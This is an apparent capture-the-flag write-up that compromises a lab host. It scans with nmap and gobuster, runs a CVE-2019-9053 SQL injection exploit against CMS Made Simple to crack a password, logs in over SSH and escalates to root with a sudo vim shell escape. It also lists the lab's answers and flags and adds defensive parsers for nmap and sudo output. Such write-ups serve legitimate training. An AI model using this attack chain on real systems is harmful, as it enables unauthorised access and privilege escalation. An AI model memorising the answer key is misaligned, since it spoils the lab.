
Note

This is my first post. It is a personal memo.

How many services are running under port 1000?

Check the running services with nmap.

$nmap -A 10.10.119.50
--------
Starting Nmap 7.60 ( https://nmap.org ) at 2024-07-09 02:59 BST
Nmap scan report for ip-10-10-119-50.eu-west-1.compute.internal (10.10.119.50)
Host is up (0.00046s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.87.57
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 2 disallowed entries 
|_/ /openemr-5_0_1_3 
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a:cd:a9:23 (RSA)
|   256 9b:d1:65:07:51:08:00:61:98:de:95:ed:3a:e3:81:1c (ECDSA)
|_  256 12:65:1b:61:cf:4d:e5:75:fe:f4:e8:d4:6e:10:2a:f6 (EdDSA)
MAC Address: 02:BF:6D:85:80:73 (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.13 (92%), Linux 3.8 (92%), Crestron XPanel control system (89%), HP P2000 G3 NAS device (86%), ASUS RT-N56U WAP (Linux 3.4) (86%), Linux 3.1 (86%), Linux 3.16 (86%), Linux 3.2 (86%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (86%), Linux 2.6.32 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.46 ms ip-10-10-119-50.eu-west-1.compute.internal (10.10.119.50)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.34 seconds

Two: ftp and http.

2

What is running on the higher port?

The nmap scan above showed ssh running on port 2222.

ssh
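As an added example (not part of the original writeup), a small parser for nmap's normal output that answers the first two questions mechanically: it counts the open services below port 1000 and names the service on the highest open port. The sample input is constructed from the scan output above; the function names are my own.

```python
import re
from typing import List, Tuple

# Constructed sample: the port lines taken from the nmap scan in this writeup
NMAP_OUTPUT = """\
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
"""

# Matches nmap's normal-output port lines, e.g. "2222/tcp open  ssh     OpenSSH ..."
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

def parse_ports(output: str) -> List[Tuple[int, str, str, str, str]]:
    """Return (port, proto, state, service, version) for each port line.
    The header and NSE script lines ('|', '|_') do not match and are skipped."""
    ports = []
    for line in output.splitlines():
        m = PORT_LINE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            ports.append((int(port), proto, state, service, version or ""))
    return ports

def open_services_below(output: str, limit: int = 1000) -> List[str]:
    """Names of open services on ports strictly below `limit`."""
    return [svc for port, _, state, svc, _ in parse_ports(output)
            if state == "open" and port < limit]

def highest_open_service(output: str) -> str:
    """Service name on the highest-numbered open port."""
    opened = [(p, s) for p, _, st, s, _ in parse_ports(output) if st == "open"]
    return max(opened)[1]

def anonymous_ftp_enabled(output: str) -> bool:
    """True when the ftp-anon NSE script reported anonymous login allowed."""
    return "ftp-anon: Anonymous FTP login allowed" in output

if __name__ == "__main__":
    print(open_services_below(NMAP_OUTPUT))   # ['ftp', 'http']
    print(highest_open_service(NMAP_OUTPUT))  # ssh
```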

What's the CVE you're using against the application?

Since http is running on port 80, check it in a browser.
It appears to be running on Apache. (screenshot omitted)

Look for hidden directories with gobuster.

$gobuster dir -u http://10.10.119.50 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.119.50
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2024/07/09 03:06:33 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/index.html (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)
/simple (Status: 301)
===============================================================
2024/07/09 03:06:34 Finished
===============================================================

/simple looks interesting, so open it. The page footer says
"This site is powered by CMS Made Simple version 2.2.8".

Search the web for vulnerabilities in CMS Made Simple version 2.2.8.

Found one.

CVE-2019-9053

To what kind of vulnerability is the application vulnerable?

Reading the details shows it is a SQL injection.
I assumed the answer would simply be "SQL Injection", but apparently the answer is four characters.

sqli

What's the password?

Get the exploit with git clone, then run

python3 exploit.py -u http://10.10.119.50/simple --crack -w /usr/share/wordlists/dirb/common.txt

which outputs:

[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96
[+] Password cracked: secret

That gives the username and password.

secret

Where can you login with the details obtained?

Now that we have a username and password, presumably we use
the ssh service found earlier on port 2222.

ssh

What's the user flag?

$ssh -p 2222 mitch@10.10.119.50

Note: the port number must be specified.
After entering the password, the login succeeds.
Found user.txt.

G00d j0b, keep up!

Is there any other user in the home directory? What's its name?

Going up one directory level shows there is one more user.

sunbath

What can you leverage to spawn a privileged shell?

$sudo -l
User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim

Only vim can be run with elevated privileges.

vim
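From the defender's side, the `sudo -l` output above is exactly what a sudoers audit should flag. The following is an added example (not part of the original writeup): it parses `sudo -l` style privilege lines and reports password-less root rules for commands that can hand the caller a shell. The sample input is constructed from the output above; the function names and the binary list are my own assumptions.

```python
import re
from typing import List, Dict

# Constructed sample, copied from the `sudo -l` output in this writeup
SUDO_L_OUTPUT = """\
User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim
"""

# Matches sudoers-style privilege lines as printed by `sudo -l`:
#   (runas_user[ : runas_group]) [TAG: ...] command[, command ...]
RULE = re.compile(r"^\s*\(([^)]+)\)\s+((?:[A-Z]+:\s*)*)(.+?)\s*$")

# Editors that can open an interactive shell from inside the program; vim is
# the one this writeup names (via GTFOBins). Assumed list, extend for real audits.
SHELL_ESCAPE_BINARIES = {"vim", "vi"}

def parse_sudo_l(output: str) -> List[Dict[str, object]]:
    """Parse each privilege line into runas user, tags and commands."""
    rules = []
    for line in output.splitlines():
        m = RULE.match(line)
        if not m:
            continue  # header line such as "User mitch may run ..."
        runas, tags, cmds = m.groups()
        rules.append({
            "runas": runas.split(":")[0].strip(),
            "tags": [t for t in tags.replace(" ", "").split(":") if t],
            "commands": [c.strip() for c in cmds.split(",")],
        })
    return rules

def risky_rules(output: str) -> List[str]:
    """One finding per root-capable, password-less command that can spawn a shell
    (or an unrestricted ALL)."""
    findings = []
    for rule in parse_sudo_l(output):
        if rule["runas"] not in ("root", "ALL") or "NOPASSWD" not in rule["tags"]:
            continue
        for cmd in rule["commands"]:
            name = cmd.split()[0].rsplit("/", 1)[-1]
            if cmd == "ALL" or name in SHELL_ESCAPE_BINARIES:
                findings.append(f"{rule['runas']} NOPASSWD {cmd}: shell escape possible")
    return findings

if __name__ == "__main__":
    for finding in risky_rules(SUDO_L_OUTPUT):
        print(finding)  # root NOPASSWD /usr/bin/vim: shell escape possible
```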

What's the root flag?

Look up a privilege escalation method on GTFOBins.

$sudo vim -c ':!/bin/sh'

Escalated to root.

#whoami
root
# find / -name root.txt
find: ‘/run/user/108/gvfs’: Permission denied
/root/root.txt
# cd /root 
# cat *
W3ll d0n3. You made it!

W3ll d0n3. You made it!
